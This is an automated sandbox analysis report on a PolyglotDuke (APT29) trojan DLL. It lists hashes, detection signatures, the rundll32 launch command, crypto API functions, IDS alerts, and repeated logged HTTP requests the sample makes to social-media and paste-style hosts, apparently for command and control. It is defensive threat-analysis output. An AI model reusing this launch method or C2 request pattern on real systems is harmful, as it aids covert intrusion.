Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report unmapped_executable_of_polyglot_duke.bin

Overview

General Information

Sample Name:unmapped_executable_of_polyglot_duke.bin (renamed file extension from bin to dll)
Analysis ID:356346
MD5:b06e835c0c28ecc8dec84cfc1ac10285
SHA1:de1df46e1fa3ff9c500efb8b367c663f2317f4dd
SHA256:68b2524160410a18cd61ba66d9699cdfde6a4c7ffc207667d20c90fa84a03a87
Tags:APT29PolyGlotDukeTrojanUnpacked

Most interesting Screenshot:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • loaddll64.exe (PID: 6992 cmdline: loaddll64.exe 'C:\Users\user\Desktop\unmapped_executable_of_polyglot_duke.dll' MD5: 40E30D559A47CDA935973FA18C34ABA6)
    • rundll32.exe (PID: 7048 cmdline: rundll32.exe C:\Users\user\Desktop\unmapped_executable_of_polyglot_duke.dll,InitSvc MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: unmapped_executable_of_polyglot_duke.dllVirustotal: Detection: 11%Perma Link
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67704578 CryptImportKey,malloc,CryptEncrypt,free,malloc,CryptDestroyKey,2_2_67704578
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_6770163C malloc,CryptAcquireContextW,2_2_6770163C
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67703A1C CryptCreateHash,CryptHashData,CryptGetHashParam,lstrcpyA,free,malloc,malloc,CryptDestroyHash,2_2_67703A1C
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_6770532C malloc,malloc,CryptGenRandom,free,free,2_2_6770532C
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67702804 lstrlenA,malloc,swprintf,free,free,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptImportKey,CryptDestroyHash,CryptVerifySignatureW,free,2_2_67702804
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67704688 CryptImportKey,malloc,CryptDecrypt,free,malloc,CryptDestroyKey,2_2_67704688

Compliance:

barindex
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 5.9.110.84:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.42.1:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.42.70:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.204.156:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49785 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49803 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.42.1:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49827 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49856 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49874 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49883 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49892 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49910 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49929 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49951 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49960 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49969 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49979 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.6:49997 version: TLS 1.2
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: unmapped_executable_of_polyglot_duke.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67703C7C lstrcpyW,free,lstrlenW,SHFileOperationW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,SHFileOperationW,FindNextFileW,FindClose,2_2_67703C7C
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_677030C4 lstrcpyW,lstrcatW,FindFirstFileW,malloc,realloc,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,2_2_677030C4

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:54064 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:54982 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:63816 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:55014 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:62208 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:57574 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:56628 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:60778 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:53799 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:54683 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:61178 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:55066 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2018316 ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses 8.8.8.8:53 -> 192.168.2.6:55066
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:56570 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:58454 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:55180 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:58721 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:57691 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:52943 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:59489 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:64022 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:50248 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:64413 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:60345 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:58730 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:53830 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:53187 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:55728 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2028850 ET TROJAN PolyglotDuke Domain Observed 192.168.2.6:55694 -> 8.8.8.8:53
Source: Joe Sandbox ViewIP Address: 104.244.42.1 104.244.42.1
Source: Joe Sandbox ViewIP Address: 104.244.42.1 104.244.42.1
Source: Joe Sandbox ViewIP Address: 216.239.32.21 216.239.32.21
Source: Joe Sandbox ViewIP Address: 216.239.32.21 216.239.32.21
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
